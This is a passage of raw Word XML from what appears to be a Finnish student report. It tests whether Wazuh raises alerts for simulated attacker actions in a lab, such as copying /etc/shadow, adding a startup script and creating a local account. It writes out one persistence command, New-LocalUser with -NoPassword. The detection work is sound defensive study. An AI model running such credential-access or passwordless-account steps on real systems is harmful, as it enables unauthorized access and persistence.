                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4410691" cy="285790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00563D9A" w:rsidP="00C47CED" w:rsidRDefault="00DD265B" w14:paraId="47646E27" w14:textId="495C89EB">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971532" w:id="50"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidR="00AA5496">
        <w:t xml:space="preserve">/etc/shadow </w:t>
      </w:r>
      <w:r w:rsidR="005A471F">
        <w:t>kopiointi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00563D9A" w:rsidP="00BF7EE1" w:rsidRDefault="00C47CED" w14:paraId="79707BAE" w14:textId="3AB1AEFB">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00563D9A">
        <w:t>ästä syntyy wazuhiin hälytys</w:t>
      </w:r>
      <w:r w:rsidR="00915602">
        <w:t>. (Kuvio 16)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915602" w:rsidP="00915602" w:rsidRDefault="003900CF" w14:paraId="40C38424" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="003900CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="293F5FA5" wp14:editId="116B9C11">
            <wp:extent cx="6120130" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="951007898"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7898" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, numero, Fontti&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003900CF" w:rsidP="00915602" w:rsidRDefault="00915602" w14:paraId="37881B2E" w14:textId="207FB044">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971533" w:id="51"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidR="008245BE">
        <w:t>Shadowin käsittelystä aiheutunut hälytys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003900CF" w:rsidP="00BF7EE1" w:rsidRDefault="00672E34" w14:paraId="35FE1F7D" w14:textId="540A7876">
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="003900CF">
        <w:t>älytys ei suoranaisesti kerro että /etc/shadow tiedostoon on koskettu, vaan se syntyy sudo</w:t>
      </w:r>
      <w:r w:rsidR="00ED3573">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003900CF">
        <w:t xml:space="preserve">oikeuksien käytöstä leevi käyttäjällä. </w:t>
      </w:r>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="003900CF">
        <w:t>un hälytystä tarkastelee, käy sieltä ilmi mitä on tehty.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E173B0" w:rsidP="00C47CED" w:rsidRDefault="00DA1E64" w14:paraId="077746BF" w14:textId="55ACDF2C">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1339283002" w:id="209469135"/>
      <w:r w:rsidR="7D69D1B0">
        <w:rPr/>
        <w:t>Skriptien ajo käynnistyksessä</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209469135"/>
    </w:p>
    <w:p w:rsidR="00DA1E64" w:rsidP="00DA1E64" w:rsidRDefault="00ED3573" w14:paraId="1C54BDD3" w14:textId="528A827A">
      <w:r w:rsidR="0A22EA65">
        <w:rPr/>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="7D69D1B0">
        <w:rPr/>
        <w:t>yökkääjä voi asettaa järjestelmän ajamaan komentoja/</w:t>
      </w:r>
      <w:r w:rsidR="1E109177">
        <w:rPr/>
        <w:t>skriptejä käynnistyksen yhteydessä, ja näin saa pidettyä jalansijaa kohdeympäristöön</w:t>
      </w:r>
      <w:r w:rsidR="776C2669">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="1E109177">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="776C2669">
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="1E109177">
        <w:rPr/>
        <w:t>jetaan seuraavaksi WS01:llä komenno</w:t>
      </w:r>
      <w:r w:rsidR="00476CE4">
        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="1E109177">
        <w:rPr/>
        <w:t xml:space="preserve"> kuvion </w:t>
      </w:r>
      <w:r w:rsidR="00476CE4">
        <w:rPr/>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="1E109177">
        <w:rPr/>
        <w:t xml:space="preserve"> mukaisesti. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="125F6AE1" w:rsidP="261F289F" w:rsidRDefault="125F6AE1" w14:paraId="17C7FE7C" w14:textId="274AC3DD">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="125F6AE1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="125F6AE1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> voisi tässä tilanteessa huomata konfiguroinnin muutokset järjestelmässä ja tiedostojen manipuloinnin. Se voi myös nähdä lokeista, jos toiminta on epäilyttävää tai muuten erilaista normaalista. </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="125F6AE1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="125F6AE1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> voi myös huomata normaalista poikkeavat komennot, joita ei yleensä suoritettaisi laitteilla, kuten tässä ”hyökkääjän” suorittama skripti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00476CE4" w:rsidP="00476CE4" w:rsidRDefault="00F06BB9" w14:paraId="76E4E1DC" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00F06BB9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0061E710" wp14:editId="4B681C6F">
            <wp:extent cx="6120130" cy="270510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118801133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1339" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="270510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06BB9" w:rsidP="00476CE4" w:rsidRDefault="00476CE4" w14:paraId="5CC7F7A2" w14:textId="7DCE028D">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971534" w:id="53"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidR="00A21068">
        <w:t>Startup komento</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F06BB9" w:rsidP="00DA1E64" w:rsidRDefault="00476CE4" w14:paraId="02C6E0EC" w14:textId="0D06253D">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F06BB9">
        <w:t xml:space="preserve">ästä aiheutuu </w:t>
      </w:r>
      <w:r w:rsidR="00A21068">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00F06BB9">
        <w:t>azuhiin hälytys</w:t>
      </w:r>
      <w:r w:rsidR="00A21068">
        <w:t>. H</w:t>
      </w:r>
      <w:r w:rsidR="00F06BB9">
        <w:t>äly</w:t>
      </w:r>
      <w:r w:rsidR="00D74172">
        <w:t xml:space="preserve">tyksen muodostumisessa meni melko kauan. </w:t>
      </w:r>
      <w:r>
        <w:t>(Kuvio 18)</w:t>
      </w:r>
      <w:r w:rsidR="00A21068">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B10F41" w:rsidP="00B10F41" w:rsidRDefault="00A4183B" w14:paraId="1C1B343D" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00A4183B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A09002" wp14:editId="5098E405">
            <wp:extent cx="5148712" cy="2362809"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="732594608"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4608" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, numero&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5150948" cy="2363835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DA1E64" w:rsidR="00A4183B" w:rsidP="00B10F41" w:rsidRDefault="00B10F41" w14:paraId="2EE676EB" w14:textId="471787D8">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971535" w:id="54"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidR="00A21068">
        <w:t xml:space="preserve"> Startup skriptistä aiheutunut hälytys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003900CF" w:rsidP="00C47CED" w:rsidRDefault="0009249A" w14:paraId="2B5D422F" w14:textId="7687D57A">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc2031889781" w:id="906822279"/>
      <w:r w:rsidR="0009249A">
        <w:rPr/>
        <w:t>Uuden käyttäjän luonti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="906822279"/>
    </w:p>
    <w:p w:rsidR="002204B5" w:rsidP="002204B5" w:rsidRDefault="0009249A" w14:paraId="7A13E018" w14:textId="40257F63">
      <w:r w:rsidR="0009249A">
        <w:rPr/>
        <w:t>Hyökkääjä saattaa haluta luoda uuden käyttäjän järjestelmään</w:t>
      </w:r>
      <w:r w:rsidR="003C0CED">
        <w:rPr/>
        <w:t xml:space="preserve">. toteutetaan komento </w:t>
      </w:r>
      <w:r w:rsidR="003C0CED">
        <w:rPr/>
        <w:t>New-</w:t>
      </w:r>
      <w:r w:rsidR="003C0CED">
        <w:rPr/>
        <w:t>LocalUser</w:t>
      </w:r>
      <w:r w:rsidR="003C0CED">
        <w:rPr/>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="003C0CED">
        <w:rPr/>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidR="003C0CED">
        <w:rPr/>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidR="00897603">
        <w:rPr/>
        <w:t>T1136.001”</w:t>
      </w:r>
      <w:r w:rsidR="003C0CED">
        <w:rPr/>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="003C0CED">
        <w:rPr/>
        <w:t>NoPassword</w:t>
      </w:r>
      <w:r w:rsidR="7EB1A008">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EB1A008" w:rsidP="261F289F" w:rsidRDefault="7EB1A008" w14:paraId="1499C12A" w14:textId="4742FAEE">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Käyttäjän luonnista </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Wazuhiin</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> tulee hälytys, koska se on tunnettu </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">, eli pysymistaktiikka järjestelmässä. Huomautus tulee, vaikka käyttäjän luonti olisi normaalia toimintaa. Jos se on luotu hyökkääjän toimesta, vaikka työajan ulkopuolella, organisaation SOC-tiimi voi nähdä sen reaaliajassa </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Wazuhissa</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>. Tässä käytetty komento aiheuttaa W</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>azuh</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="7EB1A008">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> järjestelmään hälytyksiä käyttäjän luonnista. (Kuvio 19)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B10F41" w:rsidP="00B10F41" w:rsidRDefault="006A3857" w14:paraId="1DE18AD5" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="006A3857">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="353CC804" wp14:editId="7A5D5672">
            <wp:extent cx="6120130" cy="1453515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="778875257"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5257" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, Fontti, viiva, numero&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1453515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3857" w:rsidP="00B10F41" w:rsidRDefault="00B10F41" w14:paraId="61C57920" w14:textId="159F994D">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971536" w:id="56"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidR="00A21068">
        <w:t xml:space="preserve"> Hälyty</w:t>
      </w:r>
      <w:r w:rsidR="005A471F">
        <w:t>ksiä uuden käyttäjän luonnista</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3857" w:rsidP="002204B5" w:rsidRDefault="005A471F" w14:paraId="1307B9F0" w14:textId="5D99BF27">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00CB317F">
        <w:t>älytyksestä selviää luodun käyt</w:t>
      </w:r>
      <w:r w:rsidR="009616C5">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00CB317F">
        <w:t>äjän nimi eli T</w:t>
      </w:r>
      <w:r w:rsidR="00AB4E38">
        <w:t>1136.001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ja</w:t>
      </w:r>
      <w:r w:rsidR="00AB4E38">
        <w:t xml:space="preserve"> käyttäjä, joka suoritti luonnin eli Administrator sekä työasema WS01.ad.ttc60z.vle.fi</w:t>
      </w:r>
      <w:r w:rsidR="00D45E7C">
        <w:t>. (Kuvio 20</w:t>
      </w:r>
      <w:r w:rsidR="00316489">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D45E7C" w:rsidP="00D45E7C" w:rsidRDefault="00AB4E38" w14:paraId="23CC8A7E" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AB4E38">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0850A114" wp14:editId="2F66F7F0">
            <wp:extent cx="6120130" cy="1624965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="135134196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41969" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1624965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB4E38" w:rsidP="00D45E7C" w:rsidRDefault="00D45E7C" w14:paraId="44BEDEAA" w14:textId="3E33A04F">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971537" w:id="57"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidR="005A471F">
        <w:t>Hälytyksen lisätietoja</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727CBE" w:rsidP="00C47CED" w:rsidRDefault="00FF2056" w14:paraId="20ED4C49" w14:textId="09988085">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1773402701" w:id="2067386953"/>
      <w:r w:rsidR="00FF2056">
        <w:rPr/>
        <w:t>Windows-Järjestelmä</w:t>
      </w:r>
      <w:r w:rsidR="00EC0EC8">
        <w:rPr/>
        <w:t>prosessin käynnistäminen tai muokkaaminen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2067386953"/>
    </w:p>
    <w:p w:rsidR="009F1C14" w:rsidRDefault="009F1C14" w14:paraId="359805B9" w14:textId="7F5AC683">
      <w:r w:rsidR="009F1C14">
        <w:rPr/>
        <w:t xml:space="preserve">Simuloidaan </w:t>
      </w:r>
      <w:r w:rsidR="00F24837">
        <w:rPr/>
        <w:t>tilannetta,</w:t>
      </w:r>
      <w:r w:rsidR="009F1C14">
        <w:rPr/>
        <w:t xml:space="preserve"> jossa hyökkääjä luo uuden järjestelmäprosessin</w:t>
      </w:r>
      <w:r w:rsidR="00312D2C">
        <w:rPr/>
        <w:t>, jonka avulla hy</w:t>
      </w:r>
      <w:r w:rsidR="00D0137A">
        <w:rPr/>
        <w:t>ö</w:t>
      </w:r>
      <w:r w:rsidR="00312D2C">
        <w:rPr/>
        <w:t xml:space="preserve">kkääjä saa varmistettua järjestelmässä jalansijaansa. </w:t>
      </w:r>
      <w:r w:rsidR="26312FDF">
        <w:rPr/>
        <w:t>Wazuhin</w:t>
      </w:r>
      <w:r w:rsidR="26312FDF">
        <w:rPr/>
        <w:t xml:space="preserve"> tulisi huomata nämä prosessien muutokset, koska se seuraa järjestelmien konfigurointeja ja muutoksia niihin.</w:t>
      </w:r>
      <w:r w:rsidR="0F2866E5">
        <w:rPr/>
